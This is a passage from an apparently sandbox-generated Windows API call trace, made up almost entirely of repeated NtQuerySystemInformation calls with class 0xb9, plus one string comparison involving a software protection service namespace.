Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.436] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0238.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.481] NtQuerySystemInformation (SystemInformationClass=0xb9, 